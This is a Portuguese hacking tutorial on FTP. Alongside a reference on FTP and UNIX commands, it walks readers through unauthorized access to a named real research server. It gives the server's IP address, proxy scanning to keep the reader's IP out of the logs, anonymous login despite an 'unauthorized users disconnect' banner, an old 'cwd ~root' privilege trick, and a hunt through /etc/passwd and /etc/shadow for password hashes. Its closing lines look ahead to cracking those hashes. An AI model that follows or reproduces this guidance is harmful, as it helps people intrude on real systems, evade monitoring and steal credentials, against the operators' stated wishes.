CONTEUDO

O que FTP
- Conceitos bsicos
- Cliente/Servidor
- Porta padro
- Como conectar
- Comandos
- TraDuo de nome de arquivos
- Mensagens FTP

Servidor alvo
- Sobre o servidor que envia dados para NASA

Visualizando o servidor FTP com proxy
- Webexploiter
- Como pegar o IP do servidor
- Procurando portas abertas
- Visualizando FTP de uma forma segura

Visualizando os arquivos do FTP diretamente de seu computador
- Como pegar o IP
- Verificando se a porta 21 est aberta
- Logando no servidor
- Definindo um diretrio local
- Listando diretrios
- Abrindo diretrios e listando arquivos
- Procurando arquivos ocultos
- Baixando arquivos do servidor
- Enviando arquivo para o servidor
- Visualizando o arquivo do Banner
- Analisando os arquivos
- Restries

Enviando comandos diretamente para o servidor
- Entendendo os comandos
- Logando no Sistema
- Sistema operacional
- Conexo de Dados
- Comandos que utilizam conexo de dados

FTP via TELNET
- Conexo direta com o servidor

- Conexo de rede via FTP
- Como criar uma conexo de rede com o servidor

FTP UNIX
- Usurios
- Navegao
- Principais comandos UNIX
- Modificando os permisses
- Principais diretrios

- Senhas e Exploits
- Login annimo
- Logar como root
- Diretrio das senhas
- Decriptografando uma senha
- Quebrando uma senha
- Exploits UNIX
- BuG DE PHF
- Principais Falhas de FTP



PREFCIO PREFCIO PREFCIO PREFCIO


Atualmente invadir um servidor de FTP no mais uma tarefa facio.
Os sistemas operacionais, protocolos evoluram, muitos bugs foram
corrigidos. Mas ainda esta longe de ser perfeito, existem muitas falhas,
formas de invaso. O que no existe mais so as formulas prontas do tipo
use este script que voc esta dentro do servidor
Para voc conseguir entrar em um servidor FTP, antes de tudo voc
precisa saber como ele funciona, quais as vulnerabilidades do servidor e
de seu sistema operacional, conhecer a fundo o protocolo FTP, seus
comandos, ou seja, preciso realmente estudar.
O propsito desta apostila este, estudar o funcionamento e
vulnerabilidades de um servidor FTP. Eu usei um servidor Americano que
envia dados para NASA como exemplo, deixei tudo passo a passo como
logar e navegar no servidor, porem quero deixar claro que no tem nada
de ilegal, o servidor tem suas protees como veremos mais adiante. No
estou promovendo nenhum tipo de crime virtual, usem isto para aumentar
seu conhecimento em segurana, lembrando que se voc mudar um byte
de um servidor que voc no tem autorizao crime.




Rackerox
rackerox@hotmail.com
















O QUE FTP

FTP significa File Transfer Protocol (Protocolo de Transferncia de Arquivos), e uma forma
bastante rpida e verstil de transferir arquivos, sendo uma das mais usadas na internet.
Um Website precisa de um servidor FTP para guardar seus arquivos. Quando voc visita um site
na internet, voc esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu
computador.
Se voc tiver acesso ao servidor FTP de um site, voc ter acesso aos arquivos deste site, e mais
se voc estiver logado o FTP voc poder mudar os arquivos

Primeiramente vamos entender alguns conceitos.
Para existir uma comunicao entre computadores necessrio:
-Um endereo de cada computador (IP)
-Um linguagem que os dois computadores entendam ( protocolos)
-Como so vrios servios ao mesmo tempo,exemplo chat ,site ,remote, etc...Cada servio precisa ter uma
porta especifica, caso contrario os dados de um servio iriam ser recebidos por outros.

Cliente / Servidor
Sem complicar...o conceito simples:
Cliente o seu programa de ftp que esta no seu computador.
Servidor o que est hospedado junto com o site.
(voc tambm pode criar um servidor em seu computador)
O Servidor remoto aceita uma conexo de controle do cliente local. O cliente envia comandos para o servidor
e a conexo persiste ao longo de toda a sesso (tratando-se assim de um protocolo que usa o TCP).O servidor
cria uma conexo de dados para a transferncia de dados, sendo criada uma conexo para cada arquivo
transferido. Estes dados so transferidos do servidor para o cliente e vice e versa.
Os comandos esto separados dos dados e o cliente pode enviar comandos durante a transferncia de dados. O
encerramento da conexo indica o fim do arquivo.

Porta padro
A porta padro para FTP a porta 21

Como conectar
Existem vrios Programas de cliente FTP, mas eles apenas servem para manuteno de sites. O melhor
programa mesmo so os clientes que no usam interface grfica, eles funcionam com linha de comando,
funcionam no MS-DOS ou no Prompt de Comando no windows.
Vamos fazer um conexo com um servidor FTP usando o programa de FTP que existe no windows XP.Este
programa no tem interface grfica, ele roda no Prompt de comando.
Para abrir o prompt de comando v em executar e digite cmd.
Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora voc
esta com o programa aberto, preciso aprender os comandos.

Comandos FTP
Estes comandos funcionam com voc logado no servidor.Voc ter controle total sobre os arquivos
hospedados.





COMANDO SINTAXE DESCRIO
! ! COMANDO
Executa COMANDO na mquina local.
No prompt do ftp, os comandos digitados so, a princpio,
executados na mquina remota. Para executar um comando na
mquina local preceda o mesmo com o !
ascii ascii
Configura o tipo de transferncia de arquivos para ASCII. o valor
padro
bell bell Emite um bip quando um comando completado
binary binary Configura o tipo de transferncia de arquivos para binrio.
bye bye Encerra a sesso ftp e retorna ao interpretador de comandos
cd cd DIRETRIO Muda o diretrio de trabalho para DIRETRIO
cdup cdup Muda para o diretrio que est um nvel acima do direttio atual
chmod chmod MODO ARQUIVO Altera as permisses de ARQUIVO de acordo com MODO.
close close Encerra a sesso ftp e retorna ao interpretador de comandos
delete delete ARQUIVO Apaga ARQUIVO
dir dir DIRETRIO ARQUIVO-LOCAL
Lista o contedo de DIRETRIO colocando o resultado em
ARQUIVO-LOCAL, que um arquivo na sua mquina. Se
DIRETRIO no for especificado, ser listado o contedo do
diretrio atual. Se ARQUIVO-LOCAL no for especificado a
listagem ser enviada para a tela.
get
get ARQUIVO-REMOTO ARQUIVO-
LOCAL
Baixa ARQUIVO-REMOTO para sua mquina com o nome de
ARQUIVO-LOCAL. Se ARQUIVO-LOCAL no for especificado o
arquivo ser baixado com o mesmo nome que tem na mquina remota.
help help COMANDO
Descreve sumariamente o COMANDO. Se este no for especificado
ser exibida a lista de todos os comandos.
lcd lcd DIRETRIO Muda o diretrio de trabalho na mquina local.
ls ls DIRETRIO ARQUIVO-LOCAL
Lista o contedo de DIRETRIO colocando o resultado em
ARQUIVO-LOCAL, que um arquivo na sua mquina. Se
DIRETRIO no for especificado, ser listado o contedo do
diretrio atual. Se ARQUIVO-LOCAL no for especificado a
listagem ser enviada para a tela.
mdelete mdelete ARQUIVOS Apaga ARQUIVOS
mdir
mdir DIRETRIOS ARQUIVO-
LOCAL
Semelhante a dir, porm lista o contedo de vrios diretrios
mget mget ARQUIVOS Semelhante a get, porm baixa vrios arquivos
mkdir mkdir DIRETRIO Cria um diretrio com o nome de DIRETRIO
mls
mls DIRETRIOS ARQUIVO-
LOCAL
Semelhante a ls, porm lista o contedo de vrios diretrios
mode mode MODO
Configura o modo de transferncia de arquivos para MODO. O modo
padro "stream"
modtime modtime ARQUIVO Exibe a hora da ltima modificao de ARQUIVO
mput mput ARQUIVOS Semelhante a put, porm envia vrios arquivos
newer
newer ARQUIVO-REMOTO
ARQUIVO-LOCAL
Substitui o ARQUIVO-LOCAL pelo ARQUIVO-REMOTO se a hora
de modificao do ARQUIVO-REMOTO for mais recente
nlist
nlist DIRETRIOS ARQUIVO-
LOCAL
Semelhante a nls
put
put ARQUIVO-LOCAL ARQUIVO-
REMOTO
Envia ARQUIVO-LOCAL para o servidor ftp nomeando-o como
ARQUIVO-REMOTO. Se ARQUIVO-REMOTO no for
especificado o arquivo ser enviado com o nome de ARQUIVO-
LOCAL
pwd pwd Exibe o caminho completo(PATH) do diretrio atual
quit quit Semelhante a bye
recv recv ARQUIVO-REMOTO Semelhante a get
ARQUIVO-LOCAL
reget
reget ARQUIVO-REMOTO
ARQUIVO-LOCAL
Semelhante a get com a diferena que se ARQUIVO-LOCAL existe
e menor que ARQUIVO-REMOTO, reget considera que
ARQUIVO-LOCAL ARQUIVO-REMOTO parcialmente
transferido e contiua a transferncia do arquivo. Muito til quando se
baixa arquivos grandes.
remotehelp
rhelp
remotehelp COMANDO
rhelp COMANDO
Semelhante a help, porm solicita ajuda ao servidor ftp
remotestatus
rstatus
remotestatus ARQUIVO
rstatus ARQUIVO
Exibe a situao de ARQUIVO. Se ARQUIVO no for especificado,
exibe a situao da mquina remota.
rename
rename NOME-ANTIGO NOME-
NOVO
Renomeia um arquivo
rmdir rmdir DIRETRIO Apaga DIRETRIO
send
send ARQUIVO-LOCAL ARQUIVO-
REMOTO
Semelhante a put
size size ARQUIVO Exibe o tamanho de ARQUIVO
status status Exibe a situao atual do servidor ftp
system system Exibe o tipo de sistema operacional da mquina remota
type type TIPO
Configura o tipo de transferncia de arquivos para TIPO. O padro
ASCII. Se TIPO no for especificado, ser mostrada a configurao
atual
? ? COMANDO Semelhante a help





Traduo de nomes de arquivos
A sintaxe dos nomes dos arquivos pode ser incompatvel entre diferentes Sistemas Operacionais. O UNIX usa
128 caracteres, maisculas e minsculas, enquanto que o DOS usa 8 + 3 caracteres e apenas maisculas.
Certos nomes no podem ser usados em alguns sistemas. Devido a isto tudo o BSD ftp define regras para a
traduo de nomes.



Mensagens FTP
O FTP permite dois modos de transferncia de mensagens FTP: texto (com tradues apropriadas) ou binrio
(sem traduo). Cada mensagem do servidor inclui um identificador decimal de 3 dgitos (exemplo: 226
Transfer complete). Estas mensagens podem ser vistas ou no, usando para isso o modo verbose ou quiet,
respectivamente.




















SERVIDOR ALVO

Antes de tudo quero deixar claro que isto no uma invaso ilegal, o servidor possui suas
protees, mas adiante vocs vo perceber.
Vamos ver passo a passo como chegar at os arquivos de dentro do servidor.
Site alvo: http://ned.ipac.caltech.edu/




uma base de dados do Governo Americano coordenada pelo Instituto de
tecnologia da Califrnia que fornece dados fsicos e bibliogrficos (coordenadas,
parmetros astronmicos e posio num mapa estelar) para NASA.
um laboratrio de dados extragalcticos.














Visualizando o servidor FTP com Proxy


Agora vamos exploitar o site com um Exploiter on line: http://www.webexploiter.com


1) Pegar o IP do site
Abra o webexploiter e vai em ping, vamos pingar o servidor.
Escolha a opo http delete o www e digite apenas:
ned.ipac.caltech.edu
como nesta imagem:

Clique em ping it
Pronto agora temos o IP do servidor:

Observe que a resposta do Ping vem com o IP:
134.4.10.118

2) Procurando Portas abertas no Servidor:
Neste mesmo exploiter vamos fazer um scan de portas no IP que a gente pegou.
Basta ir em PORT SCAN, selecionar todas as portas e colar o IP:

Depois clique em SCAN

Observe que o servidor responde nas portas 80 e 21



A porta 21 por padro a porta de FTP

3) Visualizando o FTP de uma forma Segura:
Agora sabendo que a porta 21 esta aberta, podemos conectar no FTP
Este mesmo exploiter possibilita que voc veja arquivos em FTPs que permitem login annimo:
Basta clicar em FTP > Visualize FTP (login annimo)
Colar o IP

Clique em START

Observe:

Ai est os diretrios do FTP
Voc pode navegar e baixar o que voc quiser, tm estudos de galxias, dados do telescpio hubble.
Como da para perceber server UNIX. Os arquivos ai rodam no linux mas da para visualizar no windows sem
problema.
Arquivos .gz so arquivos compactados o Winzip e o Winrar descompacta no windows.
Arquivos .dat s renomear para .txt que voc ver os dados.

Apesar do FTP estar permitindo login annimo a NASA no fez isto para todo mundo ficar mexendo, eles
deixaram um banner dizendo que se voc no tem autorizao pra entrar no FTP para desconectar:
If you are not authorized to access this system, disconnect now.
Procure na pasta msgs que voc vai localizar o banner.txt






Vantagem de visializar FTP primeiro no Webexploiter.

mais prtico e voc protege seu IP do log do servidor.
Observe que neste servidor da nasa os IPs de quem loga fica registrado, se voc deletar algum
arquivo, crime.


Eu no sei se este o LOG deles, mas pode ter certeza que o servidor tem um.
Quando voc entra com o Webexploiter voc conecta via Proxy.
O seu IP passa a ser: 67.15.221.2

Olhe da onde este IP:

City: Houston
State: TX
Country: US
Postal code: 77060
Area code: 281
L no Texas, bem longe da sua casa.
Alem do FTP, o Ping e o Port Scan no partem de seu computador.
Da para voc vasculhar o servidor no anonimato.
Mas ele apenas um Scan, no um site de invaso, depois de scanear se voc quiser invadir pra valer ai
outra historia.


Visualizando os arquivos do FTP diretamente de
seu computador

Eu no vou colocar senhas do site, existem muitos meios de quebrar uma senha de FTP, vou deixar apenas um
login de UNIX que funciona, mas tem permisso restrita.
A gente j tem todos os dados necessrios, mas vou fazer tudo dinovo passo a passo pelo Prompt de
Comando.


1) Pegar o IP com o Ping
ping ned.ipac.caltech.edu


2) Verificar se a porta 21 (FTP) est aberta.
Vamos usar o Telnet (no Ruindows XP, o vista no tem)
Digite:
telnet
o 134.4.10.118 21

Voc vai verificar que existe conexo e que agora as coisas ficam um pouco mais srias, olhe a mensagem:

Digite quit duas vazes e saia do telnet

4) Logando no FTP
Agora sabendo que a porta de FTP esta aberta, vamos entrar no programa de FTP do Ruindows.
Basta digitar FTP e dar enter

-agora vamos logar, digite:
o 134.4.10.118
Note que o servidor manda uma mensagem dizendo que o computador pertence ao Governo Americano,
operado pelo instituto de tecnologia da califrnia e se voc no tem autorizao para estar ali para
desconectar agora.
E depois pede o usurio

Aperte enter, vai dar falha de logon, mas tudo bem

Agora digite:
quote user ftp
Observe, ele aceita este usurio e pede o Password

Agora digite:
quote pass ftp
Olha que bunito xD, voc esta dentro do servidor da NASA.




Definindo um diretrio local
Primeiramente teremos que definir um diretrio local (em nosso computador) para o programa de
FTP baixar e enviar os arquivos.
-Crie uma pasta no seu desktop (eu criei a pasta rox)
Agora vamos definir este diretrio como diretrio local.
Use o comando lcd

Agora digite
lcd Desktop
lcd rox

Pronto agora nossa pasta de trabalho a pasta rox

Listando Diretorios
Primeiro vamos usar o comando dir
Apesar de ser um servidor UNIX o dir vai funcionar porque um comando de seu programa de FTP
do windows.

Agora temos a lista dos diretrios do servidor.
bin dev etc msgs pub usr

Tambm podemos usar o comando ls





Abrindo diretrios e listando arquivos
Para abrir um diretrio vamos usar o comando cd
Exemplo: vamos abrir o diretrio pub
O comando ser: cd pub
Observe que aparece a lista de todos os arquivos e diretrios que contem no diretrio pub


Para voltarmos um diretrio acima vamos usar o comando c ..
No c.. como no DOS, c .. C(espao)..
Digite c .. e depois ls
Observe que agora voltamos para o diretrio anterior.


Procurando arquivos ocultos
O legal de usar comandos ao invs de programas prontos so as opes que voc tem de
manipular um arquivo ou diretrio, este um exemplo.
Este servidor UNIX, em UNIX qualquer arquivo que comea com um . (ponto)
um arquivo oculto. Este arquivo invisvel a primeira vista. E se esta oculto deve ser por algum
motivo.

Vamos analisar o diretrio pub novamente.
cd pub
ls
Agora digite o comando ls la


Observe a diferena na lista de arquivos


Baixando arquivos do servidor
J que estamos no diretrio pub vamos baixar um arquivo deste diretrio.
Primeiro vamos conferir nosso diretrio local: comando lcd

Agora vamos usar o comando get para baixar o arquivo.
Importante: no aparecer nenhuma caixa de download e nenhuma barra de tempo. Dependendo
do tamanho do arquivo, vai demorar para baixar.
Vamos baixar o arquivo lisa.txt
Basta digitar:
get lisa.txt

Espere um pouco e abra a pasta rox que voc criou no desktop.
Vamos baixar um arquivo oculto, o .dat.gz
get .dat.gz


Voc pode baixar todos os arquivos que voc conseguir listar.
Se quando voc ler esta apostila os arquivos lisa.txt e .dat.gz no mais existirem tente baixar
outros.









Olhe os arquivos que nos baixamos do servidor na pasta rox


Enviando arquivo para o servidor
O comando para enviar um arquivo o comando put
Vamos tentar enviar um arquivo para o diretrio pub
Coloque qualquer arquivo no diretrio local (no nosso caso a pasta rox)
Vou colocar um arquivo qualquer.. .
Lamer_list.doc
um arquivo do Word
Agora vamos tentar enviar este arquivo para o servidor, basta digitar:
put Lamer_list.doc
Observe:

O servidor no aceitou, isto significa que o nvel do seu usurio no permite UPAR nada para
aquele diretrio. Tente em outro diretrio, mas acredito que com logim annimo voc no vai
conseguir. S com outro login.





Visualizando o arquivo do Banner
Lembra da mensagem do servidor?
Esta aqui:


Vamos traduzir:
*------------------------------------------------------------------------
* Este computador financiado pelo Governo dos Estados Unidos
* E operado pelo California Institute of Technology
* De apoio ao curso U.S. Government programas e atividades.
* Ao continuar, voc concorda com os dados que voce digitar
* Sendo monitorado. Os usurios deste sistema no tm nenhuma expectativa de
* Privacidade.
* Se voc no est autorizado a acessar a este sistema, desconecte agora.
*------------------------------------------------------------------------

Vamos achar o arquivo desta mensagem.
um arquivo de texto.
Volte para o inicio
cd ..
Agora liste
ls
Entre no diretrio msgs
cd msgs
liste este diretrio
ls
Observe na imagem o arquivo banner.txt

Agora vamos baixar este arquivo
get banner.txt



Agora observe nossa pasta rox



Abra o arquivo banner.txt
Surpresa:

Voc deve estar pensando:
Ento eu vou deletar este arquivo no servidor e colocar outro com minha mensagem no
lugar dele.
Isto o famoso Banner Grabbing.
O comando para deletar o del
E o comando para enviar arquivo o put
Mas as coisas no so to simples assim, voc esta logado como annimo e sua permisso neste
diretrio este.
drwxr-xr-x
voc esta no terceiro grupo xr-
Ai no tem nenhum w significa que voc s pode ler o arquivo e no pode gravar nada.
Com login annimo sem chance, voc ter que pegar alguma senha e logar.

Tem mais arquivos de banner ai, baixe eles e olhe.

Analisando os arquivos
Eu analisei os arquivos do servidor e no achei nada de interessante.
S tem dados de satlite, telescpio estudos de fsica.
Se fosse na guerra fria at dava para vender para Unio Sovitica rsrs.
Mas da para estudar e estrutura de diretrios e arquivos UNIX
Olhem as extenses que mais aparecem.
.dat dat uma abreviao de data (dados), este arquivo contem dados, neste caso dados de
telescpio, satlite,sei la.
Eu renomei um deles para .txt , tinha isto:

File Name: .dat, Processing Time: Thu Feb 8 04:30:00
Output option: compact_2
************************** SEARCH REQUESTS ******************************
IN_CSYS : equatorial , IN_EQUINOX : J2000.0
OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0
EXTENDED_NAME_SEARCH: Yes
SORTED_BY_FIELD : Distance_to_search_center
REDSHIFT_VELOCITY : 10000.0
DEFAULT_RADIUS : 1.000000
DEFAULT_BEGIN_YEAR : 1900
DEFAULT_END_YEAR : 2006
IAU NAME STYLE : S

NEARPOSN:
1.4514872000d ; 54.55719600 ; 1.00
Much care has gone into the collection of POSITIONS and VELOCITIES in
NED, and they are carried along with uncertainties and references to
their origin. These are continually over-written by more accurate
values as they become available.

The other "Basic Data", however -- diameters, magnitudes, flux densities,
cluster populations, etc -- are indicative values only, in the sense that
they originate in many different sources, and have not been placed on a
uniform scale. The main sources are catalogs and compilations, with the
more accurate data sets favored, and the larger ones favored at comparable
accuracy. No information is kept about the origin of "Basic Data".

More controlled and rigorous data collection is applied to PHOTOMETRIC
DATA, POSITION DATA, and REDSHIFT DATA. These measurements are carried
along with their uncertainties, references to their origin, and some
information about the data collection and processing behind them. Unlike
basic data, PHOTOMETRIC, POSITION, and REDSHIFT DATA are never erased or
updated, but should serve as a cumulative record of the measurements on
each object. As a future enhancement to NED, additional data frames
along the same lines will be introduced for kinematics, classifications,
and other parameters.
A. Galaxies (G)

Field 1: Morphology
Field 2: A magnitude in the visible range, on any scale as available
Field 3: Major axis diameter in arcmin
Field 4: Minor axis diameter in arcmin

.gz (arquivo compactado, o winzip do windows consegue descompactar)
.txt (arquivo de texto ...)
.c (so scripts, muito interessante)







Restries
Quando logamos apareceu a mensagem:

(restries aplicadas)

E quando digitamos dir apareceu isto.

d x w so cdigos de permisso para cada diretrio, mas adiante eu explicarei o que significa cada
cdigo.
Isto significa que no temos acesso a tudo dentro do servidor, agora voc percebeu que entrar
annimo, no significa burlar uma senha, mas sim entrar como um usurio com um nvel baixo e
cheio de restries. Mas, uma vs l dentro, voc pode procurar por arquivos e dados que te levam
a senha do root ou outros usurios.

ENVIANDO COMANDOS DIRETAMENTE PARA O
SERVIDOR

At agora fizemos um monte de comando, testes e tudo mais. Voc deve estar se perguntando:
Mas eu j enviei um monte de comandos?
Sim, voc enviou, mas no diretamente, voc usou o programa cliente de ftp.
Existe uma diferena em usar um programa de FTP e enviar comandos diretamente para o
servidor. O programa de FTP do windows ou do Linux apenas interpreta estes comandos
padronizados para FTP e envia para o servidor.Enviar um comando diretamente para o servidor
diferente.

Vamos ver na pratica:
Digite help
Voc vai visualizar o help do seu programa de FTP e todos os comandos que o seu programa de
FTP interpreta. No nosso caso nosso servidor um UNIX e ele interpreta mais comandos do que
apenas estes de nosso programa de FTP.
O programa de FTP do windows tem uma espcie de filtro que envia uma linha de comando
diretamente para o servidor, este filtro o comando quote ou o comando literal
Agora digite quote help
Observe que aparece um monte de comandos diferentes que o servidor interpreta, mas estes
comandos no so interpretados pelo seu programa de FTP.
IMAGEM
Existe Duas formas de enviar um comando diretamente para o servidor: usando o comando quote
ou conectando via telnet.
Vamos usar o programa de FTP mesmo

ENTENDENDO OS COMANDOS
O protocolo FTP se baseia em comandos e respostas.
Para enviar um comando basta enviar um texto pela conexo de controle (no nosso caso o nosso
computador) seguido por uma nova linha (Line Feed ASCII 10 - 0x0A)
Aps o Line Feed ASCII 10 - 0x0A o servidor executar o comando e dar uma resposta.
Formato da resposta:
220<ASCII 32 - 0x20>Resposta do Servidor<ASCII 10 - 0x0A>
220 (cdigo de retorno)
ASCII 32 - 0x20 (espao em branco)
ASCII 10 - 0x0A (uma linha nova)
Se a resposta ocupar mais de uma linha o formato seguira o mesmo padro.
220-<Espao>Resposta (Linha 1)<LineFeed>
220-<Espao>Resposta (Linha 2)<LineFeed>
Neste formato, todas as linhas, com exceo da ltima, possuem um hfen (ASCII 45 - 0x2D)
imediatamente aps o cdigo de retorno, exceto a ltima, que no possui hfen justamente para
sinalizar que a ltima linha da resposta.
Ento enquanto no aparecer o hfen deve-se aguardar o termino da resposta






LOGANDO no SISTEMA
Os comandos so simples user (para usurio) e (pass para senha)
Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos
diretamente para o servidor utilizando o comando quote
quote user seuusuario
quote pass suasenha

Se voc no souber nenhuma senha tente annimo
quote user anonymous
quote pass rackerox@ned.ipac....

Voc tambm pode tentar explorar uma falha antiga, mas s funciona com servidores
antigos.quando aparecer para logar digite isto:
quote user ftp
depois
quote cwd ~root ou quote cwd~sys quote cwd~sysop
depois
quote pass ftp

O comando cwd (Change Working Directory) usado orinalmente para abrir um diretrio, neste
caso ele iria abrir ~root ,se isto acontecer Voce estar com privilgios root, voc pode fazer o que
quiser no servidor, ter permisso para tudo, inclusive para ser preso =)

SISTEMA OPERACIONAL
Agora que j estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar
o comando syst , como um comando direto vamos usar quote syst

Agora sabemos que UNIX

CONEXO DE DADOS
Existem comandos que precisam de uma conexo de dados estabelecida, por exemplo, se for
baixar algum arquivo do servidor necessrio estabelecer portas do computador para isto.
O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando
direto ao servidor teremos que estabelecer quais sero as portas que iremos usar.
Vamos usar o comando port
O port indica ao servidor quais portas sero usadas na conexo
Neste comando, deve-se passar 6 valores separados pro vrgula. Os 4 primeiros so os dgitos do IP.
Os outros dois valores representam a porta TCP em que ser feita a conexo.para definir a porta um pouquinho
complicado, voc ter que separar os dois bytes que compem o valor da porta e convert-los para decimal.Exemplo:
Xxxxx
Exemplo do comando port

Voc tambm pode deixar o servidor especificar qual porta ser utilizada, eu acho bem melhor, ai
voc no corre o risco de especificar uma porta que j esta sendo utilizada.Para isto use o
comando pasv

Os bytes retornados nos parnteses so: os quatros primeiros so o IP, os outros dois so a porta.
Para obter o nmero da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo.
Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201).

PRINCIPAIS COMANDOS que utilizam Conexo de Dados
quote list (lista os arquivos do diretrio atual no servidor)
quote stor (Envia um arquivo para o servidor)
quote retr (Faz o download de um arquivo do servidor)

HELP
Cuidado para no se confundir com o help, este comando lista todos os comandos do servidor,
mas se voc digita apenas help voc ter os comandos do seu programa de FTP, para ver os
comandos do servidor digite quote help



Comando help (help do programa de FTP)







Comando quote help (help do servidor)














FTP via TELNET FTP via TELNET FTP via TELNET FTP via TELNET

Tambm podemos conectar um cliente Telnet na porta do FTP.
Primeiro vamos abrir nosso cliente Telnet, abra o prompt de comando novamente e digite telnet
(isto no windows XP, no vista voc ter que baixar um cliente)
Depois que voc apertar enter abrira o cliente de telnet do Windows.


Agora vamos abrir uma conexo com o servidor.
Vamos usar o comando open :
open ipdoservidor portadeconexao

Exemplo: vamos abrir uma conexo com o IP 134.4.10.118 na porta 21
Lembrando que a porta padro para FTP a porta 21.
O comando fica assim:
open 134.4.10.118 21


depois de conectado vamos logar no servidor, usando comando user
Se voce souber algum user e senha logue com ele, se no tente logar annino
User anonymous
Se o servidor aceitar ele vai pedir para voc completar com o passwd ou seu email, agora voc usa
o comando pass
Mas no servidor no existe passwd para anonymous ento voc pode inventar um endereo de
email usando o domnio do servidor.
Resumindo:
user anonymous
pass rackerox@ipac.caltech.edu

Depois s voce apertar enter que voc estar logado, observe a imagem.



Agora digite help
Vai aparecer uma lista de comandos. Esta lista de comandos no do seu cliente de telnet, mas
sim do servidor que voc esta acessando.
Observe que tem a assinatura do root: root@rad.ipac.caltech.edu





Via telnet voc ter uma conexo direta com o servidor, isto significa que voc no precisa mais do
quote, e tambm que aqueles comandos do programa de FTP no funcionar aqui.
Aqui s vo funcionar os comandos do servidor.

Para encerrar a conexo, basta digitar quit














Conexo de rede via FTP Conexo de rede via FTP Conexo de rede via FTP Conexo de rede via FTP
Podemos visualizar e manipular arquivos de um servidor FTP dentro do windows como se o
arquivo estivesse no nosso computador.
Observe a imagem, aparece as pastas no explorer, voc pode copiar, colar, recortar...



Para criar a conexo:
- Clique em Iniciar > Configuraes > Painel de Controle > Conexes de Rede.
- Em outros locais (coluna esquerda) entre em Meus Locais de Rede
- Depois clique em Adicionar local de Rede
- Agora s ir seguindo as etapas.
- Coloque o IP ou o endereo do servidor de FTP

A vantagem de usar FTP desta forma que fica bem mais simples e intuitivo.
Mas a grande Desvantagem que voc no ter as varias opes de comandos que existe no
prompt, voc est limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, voc nem
saber.





FTP UNIX

A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX.
Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP

USURIOS

Root = super usurio ( poder realizar todas as funes sem restrio )

Cada usurio classificado com um nmero, de 0 a FFFF-1 (65534).
O numero 0 designado para o Root e o 65534 para Ananymous
De 0 a 100 so de superusurios (bin, adm, user, admin, guest, etc), se o servidor for pequeno o
root e estes outros superusrios so a mesma pessoa.

NAVEGAO

Importante em Unix os comandos so Case Sensitive ( diferencia letras maisculas e minsculas
ao contrario do MS-DOS)
O Unix usa arvore de diretrios igual ao DOS mas a barra invertida, ( utilize / ao invs de \ )

ls (mostras os diretrios e arquivos, o ls equivale ao DIR /W)


ls a (mostras arquivos ocultos)

ls la (mostras arquivos ocultos com detalhes)

ls l (mostra as permisses)

exemplo:
drw-r--r-- root root 10000 1 de abril etc


d - directory
r - read - so pode ver, dar download, etc...
w - write - pode editar, gravar...
x - execute - eh um executavel ou um script (tipo .BAT do DOS)



Primeiro espao: mostra se um diretrio ou no.
Prximos 3 espaos: o que o proprietrio pode fazer com o arquivo
Prximos 3 espaos: so do GROUP que pertence o arquivo
ltimos 3 espaos: so do USER (o que qualquer usurio pode fazer)
Os ltimos nmeros so bytes ocupados.







PRINCIPAIS COMANDOS

cd nomedodiretorio (para mudar de diretrio)

cd .. (para voltar um diretrio)

pwd (para ver em que diretrio voc esta)

mkdir nomedodiretorio (para criar um diretrio)

rm arquivo (remover um arquivo, ir pedir confirmao y ou n )

cp arquivooriginal novalocalizaao (copiar um arquivo)

cat (mostra o contedo de um arquivo equivale ao type do DOS)

who ( mostra quem est conectado no server, para mandar uma mensagem utilize write
nomedouser)

get nomedoarquivo (faz download do arquivo)

cc arquivo (compila um arquivo)
gcc arquivo monedoprograma ( compila um arquivo como o cc)


MODIFICANDO AS PERMISSES

chmod muda as permisses, exemplo:

ls -l teste.txt
-rw-r--r-- LoKi LoKi 34 teste.txt
chmod g+w teste.txt ---> muda o acesso do Group para +write
ls -l teste.txt
-rw-rw-r-- LoKi LoKi 34 teste.txt

chmod a-r teste.txt ---> muda o acesso de All para -read
ls -l teste.txt
--w--w---- LoKi LoKi 34 teste.txt

chmod u+w teste.txt ---> muda o acesso de User para +write
ls -l teste.txt
--w--w--w- LoKi LoKi 34 teste.txt

resumindo:
o - para Owner
g - para o Grupo
u - para todos Usurios

Importante: somente o root ou o proprietrio pode usar o chmod.


Mais comandos
chown, muda o OWNER (proprietrio) de algum arquivo, isso se voc for o OWNER atual.
Use chown novodono nomedoarquivo
chgrp, muda o grupo a que pertence o arquivo.
Use chgrp novogrupo nomedoarquivo


PRICIPAIS DIRETORIOS

/etc/passwd
Neste diretrio esto contidos:
Usurios, Senhas , Ids
Abra o arquivo passwd, dependendo da sua permisso aparecera:

root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:

ou

zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh
(username:Password:id:uid:mini descrio:diretrio de trabalho:'command.com')

Se voc conseguir abrir o arquivo passwd voc ver que o anonymous no tem senha (por isso
voc pode logar annimo com qualquer password)
Se voc perceber algum outro user UNPASSWORDED (sem senha) e com o ID melhor que o seu,
entre logado com ele.
Mas se a senha esta ai, porque no entrar com ela agora?
Respostas, as senhas esto criptografadas, mas adiante veremos como decriptografar.

Talves quando voc abra o arquivo passwd pode aparecer isto:

root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh
ftp::12:15:Anonymous FTP:/tmp:/bin/sh

Observe que no lugar das senhas dos usurios aparece um asterisco * , isto significa que as
senhas esto em um outro lugar. Normalmente em
/etc/shadow, e as vezes ela esta -r (No read) para os Users normais.
Agora hora de trabalhar, se as senhas esto (no read) teremos que achar uma forma de v-las.
